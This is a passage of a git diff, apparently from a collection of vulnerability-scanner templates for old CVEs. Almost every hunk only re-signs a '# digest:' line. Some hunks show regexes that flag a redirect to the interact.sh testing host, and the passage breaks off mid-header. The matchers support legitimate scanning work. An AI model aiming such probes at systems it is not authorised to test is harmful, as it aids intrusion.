.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + .../vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml | 3 +-- http/vulnerabilities/other/podcast-generator-ssrf.yaml | 2 +- http/vulnerabilities/other/universal-media-xss.yaml | 3 +-- 1955 files changed, 1956 insertions(+), 3506 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 66462f75c1..7f63e00409 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ef61ca1533e038591defca31601413e69136a99bbf7b14d0bbc201bef9fb683a022100f2aed7f039abdf11ff92092ee2fb677909fc16099477db3ff353ea24cc387d39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204629b2e08144d4cc7017cda489f57d860748c8dd3062e4d262c46e75d88199bb022100f5274bf13ae7d03188feaf0c7db98dc8f1c7ad2b733b9281b2dda96d1b47266b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index df8c8c79d4..11970e98d0 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202538390ca31fa8d50672fe1ec8ca650ae5c05843e04c7231f3723bab00c84716022003a6448082170c2bbc6f16aeb840421fb4c1bfbd26cb07f7ae0dd0bd6c28e23e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009cfc251409ce4e0e3f3762a6a328d57cba5e3a41d79d6ac962c4793f4e01fa3b02200ab84b64c34b66551a937642bd7d2523b976767f6cb643c221b27f181e9702b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 222532fa70..8a768b9247 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022007afed105c841c39ef55ea55990e1c2cb8efda6cca81f97b25cafb679597e601022100fe4c3f25cbc3c7c833f00fb45e37565ae0e5212642f65b2e80f3870cef36a839:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009dadf815dda84116965f649287bacb0ff13b3668eddc5c48d0aa9636f5052b8b022001d9cd415685b53f73a2ab6bac147c5c31b1bfa5aa62f1e1d3cb30f115d39610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 3597a7c095..9ae811e0b1 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204833193541075bfeb7dfec79f83d3a0fe0681d7640012f434848e518d294f9a102203caabad5546363a7be7113f6e2bf8e3942d7ca32d533ecf331e079e21e4fdd4c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022015d0a66d954f94e85f6dd90f4d6a2301d842379e5664ea1aa956eaa09debea50022100aed15f7a26a0a9bbb534253823aee4645a376b268e27703bcdbebe3b34f7e0f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 27b2ed2d4d..d20c16a421 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4a0a00473045022068959768c399f79b6a7219aab3fe4e29592b83d8661aa5d7da4f6756421f618f022100c8d0bfb2832adfb107b5341ebe466e46bb475fb6f7aaab599792b0a96287f027:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210095f49fe2efceed6daf5a0e1f47895923f386cdcad33054888e6e2c1d18256d0d0221008214b77850e26134939f6bd33e6ba610be00543917a8f602860441a639af4282:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9a12bade20..901a5ef7ec 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100956cb53ce57b6955a1f4167477a5b71f36aac293f53f50aa53dc5cd204434a13022100b15bc8ebc3bc9214306d6eeab938536a297e94d67b859c23965616685fe80e00:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d4f9fabba123e11788e0fad9d7d8863ab864d15d1af3faedc662c678078037760220592cf254274dcc7093eb0e5973f7c1b869688931f336c39c1d730a5dea58e27d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 3c71b46342..270fa3d6fb 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206ecf6454711462b7dbb565d6ed7e8de1681c074fbf582c827e523e09b92acada022039ac2df97530fd69fac7454fa72323a6f8ad0c4bfa96405302cff4491bd271f0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022061d514eca90bd506967ae8dbac448ccfee4ef8cac6660dfdf6d133f30751d3980221009d21dafdde9e870a847a3946894c7c1ea429f1e26a888d39eab1ca7fbf0c31bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 91111ed999..5463e83c44 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4b0a00483046022100c84df2f2d6b114ed86741624367be22e8b471d244ec856a0a019459dabaf04b7022100a949b6f7927e3f36a6777db9c29bfadcfe4336f63a5ae3abb1387856b567de3b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ab3b9294b1576b987c8e61f95a4af6527dea525c4bb9827b3a3b68b70ca176350220687d07ec3d3d349726dadcffb709eab03c7b138f55c5bc7824722eabae2ed86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index c7a076e048..3d2ec3f058 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207f2beb19ee23a7aa5b3d8486e2f2301ba2ffbc27c6b1d1af22eef3b501670333022100d868347522aa0bde725f2cccb99a0a85bff8c2f8fe3777d3e871aa7d9946c887:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100961fc6dc8823876891482ef5e463e8e49d3fa94b683efeed6d268e46b5f04d120221009d20b054d64e7362bd5f41e394236246d24e23c9908acfa8c348b3a9cf83c3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index e5e8ef344f..14bd807ef5 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022030189c599b26ae07716e9ea84b8bcba265e82dbb2aee80d4f60a2960b8622843022100c660038cb30b0f9ab12168d55de7ed1bf530c46119158a9cbe1f286014ba34e5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b95a7ef0f86e657e3b5f00556868865f601aea26da411fb575568090e0aeac540220575e3f3708784f82913674adab4fc2de011ea14303ddcd6bd8e23b2852b4aee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index a43f54023c..420e023e03 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ebcb2fcbe5db0034e7d68467a9d7d1179ae461fb7d7064bfff7538722b35104f02201ce688af23eea62a398771e28455da9e35b65239c80a7362f2d66a4cc578b89b:922c64590222798bb761d5b6d8e72950 +# digest: 480a0045304302201ba28dbe1b16aca60496200f84d8d5ee5a67148d612ed0f5d01521f9fc9e5d4b021f71ff5aa51e3ef2b9bf88b2685bcf7f0fcf0317a7047ff2be7926ffb23a438b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 59b9e0fef8..5037f22d4b 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022034d32ff34d635d2ae1fede90ea931ddffe60bd0085bd8fbebf587808ac359f7f022079614a434dd5117c87c81df359c54de362a7f5bb34e1faa59122faa2c3033ba3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204c595a807a630dda5740550b1f8f8f98f96539ec48bc4169a47d2999ba6d62d002206fdc87d49a1d165bf3d6b3ad4c192c7ad28cd2183614ff32795899db715ebce0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index de9f591dab..0c7725ba8a 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022001551ce04ad4c3929f7819b06c726a8cdd159380aaec227cab2829af15719b790220103cb2a1b40db1b3ea6be28a2bf432780b6b32bcbca5aaf3b8195c7f0f0c272f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d0b42ba9801f039d48e60b938f8377947ead5d41a0dad37627a789ab762b364302203c2585af2d714ab9028cbbd6e15894e918918ccf37cbcab40fea5fba5357c776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index f1fee44d3c..dceac54f6e 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008a3dd525d9fa55739abc14a857faa6d2e899eded5824ccbaabaef848de556a9402203e28896380a2e880b820bacc6d3086191f109a8e187dec708ce3f26c31dec638:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009547839397deacfc39f66098257d7c0c65ca55a90457f6a70cb6db267ceb051b022100d75a1ce4ee9d06fbd4d581b28431274b6a358386836735b7cebed2db7a04d30e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 6c2cb6ab5f..59d3ae981d 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203f16f02910aac9d647b6e752654542d0911b46d7967e942ae37ce91e0f1cadd702201e513efe5e17faac859cf4b2d3e141d3a3fbfe1a42588a05cc56732fb6aa0489:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220786da4e4e820358de495a28b0044c45805e6344a5c3f5c671ebf8846e7bc3421022071682032770589658d2019ceb5fe248d84de9959cbfb27c2a29e56f06390f2a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index b5118d5ed8..d93ca2ba16 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c3eedd62461e37dda67348524ff81399bb484916f25ddff0cd95a868f129545a022049a10ec6c835d8516453a367102b665554f24aa6c1906d3cb54a3653d1438ea9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009216c196df3171b0dd6dca0e291845fbca957f7963f755cc8bdca9f96cce887a0220062362a74cfafaa7546c2cb8acba0acccd1223a1c95131e6b7169efe966689bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index d7f876ea98..060bc4778f 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220194b938eb7bcff1b3cd6f6d2666e8a9f549019a04f93b48f364604c13634a5d80221009b2d3c3ecc6d2ffe3c88c4c0bb7e362764aeefc9554e3eded01c7d144d59a773:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100faec2f11a8a16f82b025e701c748eefa7291cf4bb70edabcd8c1ca2a64bf898502204d6ee7b0d8ac11bd292c811a023acd5120a720fec9bd232ba94d69379358a86b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 7e6e902d1a..ee318e55a3 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502203e1aeb5fba3adaa3b5830402641b813cf8f94bc2a94add09db1c2115fa494198022100c4c252be8af5df45e2c51c2ac050d25d5070de8f17a57e7bdee4817e74bf0222:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210092580cd306890ba476ea0c43d26a876fa05bb2cb83371442d6a7079c64d2c140022100b00693f935f37a2761a449d2a5846f437c05f7ed8827027e4b8d77ad11b030eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 6efbe724e2..6b302c09d7 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200db7d6b8a0b2dd910c204b6d0fc0edfd9abc9da3b8e167e448c86febf5b6cad8022100dc7353b101404775789a15b8614ce1a10969e2ec55b2498d01858111adfd0f74:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022079a18be6881bfb062f04001d175f6c8f8134d21439d750ea250b54276ba21271022100d50aa7d10ae98513c098f90867fcacbe52c2bb51132803fcb5a6714708189bd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index ee1b7e73ad..d83324acf1 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ca7efc528df16baf994cca6fb364720a27eccd111b821a0a9b9bdb3a5e879ed0022059319cfb6e5eb2a3c61533aeeb96e043f0c4cd4a5f6b7c99859162257720e11c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b149edb86d1deab6798bb5dcf77808912001c8bb4c732ad61af9a990968fa9a9022100e69e83de58fa97c38d734359748df3fc61d8d3a1e77822040423542213ffea4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index ee26ef25c2..c1ca4bc875 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d49c7bc9e0b7b1a607aee243c51f21f4aeaddd8e891328544fda07d338b93e14022100c44e092781a629e90bc2d83dd0cd71fba546325f183e93704eb0725b76ae49fc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a4fbf1e8069c0841ddab793cd6e629324e1bdad70eea646e46fc9badf421eedc02210080a89cd3a7b0c207681d070c9d77f81adee985a761c07dd94bad35e33c220344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index f13ad5e3ad..2c8497b008 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220239dd2522ce72c86f2c2e49f76c268455d3de2eb6955b37b7571d330c83008f20221008920658789835cbff116447d16385a589bfb5734b96e3eb7a1a0c3a887d29265:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008ad2676a4916f23ef8eea268509b3cb42f451129c1a4aa9f99926bf24457761f022100920678232dbe209323229d2be6613239c7edca1bd1b4141e1aa85e68ef22d2da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 7bf9faada9..5bb538a64c 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f455fd8ef1be7fec2757ab6190ce495aca694581ca5e2da98c387236f8f0a5ee022100aad89f0fff1bf791aac256b53a5f7771e1b68931735faea6fb30122cf1e0a5ed:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201eef187a03011453570fc104c479bfa252cb1f3bd322828abaac774a5a6ffdea02201449d24df53ad92c9e9c32245ee7b0abc6cfe223265ce2e414c3a4df560e9181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index e757a6ab3f..0f1e8a323d 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210083f13b26a5a5e2db9eab30ac22f036d4983f3a67cdbe1bc70fd00a4a39111c3d022040eeb62fb1b9821918ed8439f89bcce9292ee7c6644b3a9e85b28cff2460c092:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd486ede773fb84124a82bae72c3b9d2da9bbc3db2c024d87258e4b7b00daa9402205ad77ce44d3de9e18d1854e4cc27d9bd3e8bbf693570d6b898997274f0f51ac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index cffaf29535..f7be7f1ee4 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202b4a0160f702a152cdaf2d0a92688caf411b66c5cda8df539f2ef65fb32b1552022100a69741809482dfbb00e8c4541d826a024e0e7e039f55c397a27a8f681d1c1ca6:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022029053fc8204d8521749fd802ca30b3042b09f545199d14e56fef2b4c07b0b12302204cba29a639f0eab7905a2b8faf64943aa123552ff30625a9c83f92389eba8d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 4383bce9d5..a264756548 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c6cda3c241fd520c300134b7b7b6e026d50cf70a7282b1f58e6b0a552ab971f6022056cf8f5c20daca74ceec74737d9e0d4cde245367a91802ba493c9d9b6edfca15:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204f8cd47b60f47dc5327228ef65ab5099a27433853ec74e770790fbd2827a27d4022100db6a5a126cbce9b1d629fe80855d5943f3678ff573a2fa9b4b67b6ede82c9605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index eab8d6e1c2..2e4997dac2 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 500 - -# digest: 490a004630440220678b47179eb23ca03b74ed27803d375c2b65a964efe9248baf005fd17aff94be02200ea74e608b0d404cc3d57470f10b14e5bb624bbb9786ce241dfc08c07d55ca46:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022054ae914a658b2fcd75f243bf04c16f71fd2951009e995137b97ef7753edc5c5a02205a2aebc270ffe0ce0f90ffc299ada56c0c055d2bab71ccc9581bbd7338b8bb20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index f402ca80a9..4a24c90e5e 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100db18229712f77ce8fd85a073adf3705e21aef663141827fb152df5e52cf6148d0220028454b9659c63fe4aa190c95439b29b569eb274d7e7d7431cce3edc65bde4d0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202f6ab51aec030b3b6a07312b63fb8cd01b8812c103aa0f568f59a655264d30360221008abf0b188ea1ea8ce12aba9bdc3a1bd44d68d88438de4d00f8e22d1c2df5e8f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index eabc01931f..08481d4942 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4b0a00483046022100d465569a6d608c05600104627898ec52f36f08e791b5728b66747d1a5f39cbed0221008fec0753953ddb92321e4e20a69a1682c1a113249d36753cc454798f47f57aa9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009043b1a7acf1aea3f31c30e708c0724f82046452d425a2e2d2d6b5e992053f24022009faf723c5fb5107155def5226033d474106f48271c33dbc0a5a61f214e550a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index baca233573..1b07df8902 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203cd8d3258c92318895857ef3dd861462172a6ed609d193252ba8ad25a4843932022071b1078e19de83702ddadfa17cfe75b83d008e807eb15038f44174ee95df29c3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008c9d18581a27a3446f844904ad486417701e015f5f5864b0cff73485c57a324f022100dd40c393f1f9231cb96571dc49b12980c834777e5c0fb8bc155f1f74e4ecf5a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 4d8c96faba..c70110c51d 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022012b4c13489980d556e479690e8cd474db51c2b3687cb0c8cc541cac0fb545906022100d81647f6913573994f5f64440689bab2a9c92f93ba317f90f2ad99b15f515a63:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204da53c206e90dee1c42c1a29f2eb34bcf8b53f1d120be803b4e2794e16651157022100ea35bdd223b72e757f16b1219ea05c31b5eeb95a98e10ddb6ba4aca524443df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index ddc3c2c096..a0ef5655ed 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c08412e33eac61f60b8a37b5c10229c04e909e2a56c615107a83d35fd4b68c2a022049d66dcdc24df81fafc56ae1eab165156c7f0521690938ecce2e96b7653a4f7a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203f9dbd2ed853f33763a93364c2c44c7f551d2b0c672d285dccff29682c8cccc602200e819ce2b0a2e8db15abab8f2a75e94186234ee61d3f7a8c5618a01091ee8da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 31eb779e9e..ddd816890d 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210089352a8f2e36400601403bb91191a7ae2ff4b3bc667afe695fdf9c1660fcdfce022100f9f42ec03890e4f290137db95de6402374d1bd7d55eb081ae45f306bda6b62fc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205151844f1a23ffd3e6729c41482f9e58f41aeaf537945b72fe891e9ea4d01d990221008fbe738ff6213c99522f81323153dcb3fbab1d40b6faca8c4913a0f3c420a6f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index f81520564a..887d2c953a 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022030e53562d8ffdc5fbc596e9729fad01a7b8a098c3f93fb4d3df121b016f272d2022003eb1b705c1ad930742fd603ac5f06277d2c09f86cd9bd0c41c7fe8e072a9f4b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a0c095485c271cf4ae637f836359ec0efb62488d7aa414afdee008115d45f4aa0220685d63f822c530e53109660c419397184e1df29378ecfeed8154bb85a5884b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 